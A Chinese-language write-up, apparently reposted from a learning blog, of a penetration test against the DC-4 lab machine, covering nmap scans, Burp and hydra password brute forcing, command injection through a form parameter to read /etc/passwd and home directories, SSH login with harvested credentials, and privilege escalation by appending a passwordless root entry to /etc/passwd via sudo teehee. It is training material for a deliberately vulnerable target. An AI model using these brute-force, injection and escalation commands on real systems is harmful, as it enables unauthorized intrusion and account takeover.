【CyberSecurityLearning 73】DC系列之DC-4渗透测试
目錄
DC-4靶機滲透測試
信息收集
web滲透
DC-4靶機滲透測試
DC-4對于我們來說同樣是黑盒測試
DC-4靶機MAC地址:00:0C:29:86:67:2E
kali2021:192.168.3.222/24
信息收集
1、由DC-4的mac地址獲取ip
nmap -sP 192.168.3.1/24 -oN nmap.sP??? 得知DC-4的IP為192.168.3.145
2、掃描主機所開放的端口
nmap -A 192.168.3.145 -p 1-65535 -oN nmap.A? (得知目標開放了22端口和80端口,并且80端口使用的web容器是nginx,22端口所用組件是openSSH 7.4)
3、通過瀏覽器去訪問80端口
提示可用admin來登錄,嘗試做爆破
web滲透
1、密碼爆破
上面提示用戶名為admin,嘗試使用hydra來密碼爆破
這里演示用burp suite進行爆破:
把抓到的包放到intruder模塊,做爆破!
這個爆破的密碼字典在哪?來到kali里面
密碼字典在/usr/share/john目錄下有一個password.lst,用finalshell下載到本地
來到intruder模塊,clear $,爆破的是密碼,把密碼Add $,來到payloads,把字典載入
可以點擊attack進行爆破,爆破之前點擊options,選擇線程(給500),start Attack(社區版好像不讓設置線程),爆破后得知密碼是happy
利用密碼登錄網站
2、后臺操作
登錄后臺后發現命令執行
接下來我們抓一下包,看看命令是怎么執行的
將包發送到repeater模塊
這里ls -l就可以執行一些系統命令了,可以把這些命令換成別的,換成whoami,發現能夠執行
這樣就可以判斷這里存在命令注入漏洞!
接下來:radio=cat+/etc/passwd,發現了charles,jim,sam這三個用戶,并且都存在家目錄
我們查看一下家目錄中的文件:radio=ls+-al+/home
依次看看那三個用戶的家目錄:ls -al /home/charles,一個一個看
發現在Charles中沒有特殊的文件,jim中有
我們看看backups命目錄下面有什么,看到一個舊密碼備份文件,我們看一下
將這些密碼復制到kali 創建密碼字典
再創建一個用戶字典,把那三個用戶寫進去
已經有用戶名,密碼,并且開放了22端口,嘗試爆破(hydra)
hydra -L user.dic -P old-passwords.bak ssh://192.168.3.145 -vV -o hydra.ssh
找到了用戶名和密碼,嘗試登陸(jim | jibril04)
cd /var/mail
cat jim
發現Charles直接把密碼發給jim了,Password is:? ^xHhA&hvim0y
嘗試登陸ssh
ssh charles@192.168.3.145
查看可以不需要密碼就可以使用root權限執行的命令(guid)
sudo -l
看一下charles用戶能不能sudo
發現teehee這個命令在執行期間不需要輸入root用戶密碼
teehee --help
查看幫助信息,這條命令可以在任意文件的最后追加命令
在passwd 文件末尾追加
sudo teehee -a /etc/passwd
waffle::0:0:::/bin/bash
或者 echo "waffle::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
cat /etc/passwd
嘗試ssh登陸:
ssh waffle@192.168.3.145
不過不知道我的出了什么問題導致無法這樣創建一個免密的root賬號,每次都會叫我輸入密碼,不過看網上的大部分人都成功了,就還是記錄上去
獲得root權限后去/root目錄下查看flag
總結
以上是生活随笔為你收集整理的【CyberSecurityLearning 73】DC系列之DC-4渗透测试的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 教育大数据隐私保护机制与技术研究
- 下一篇: “全息数字人”——健康医疗 大数据应用的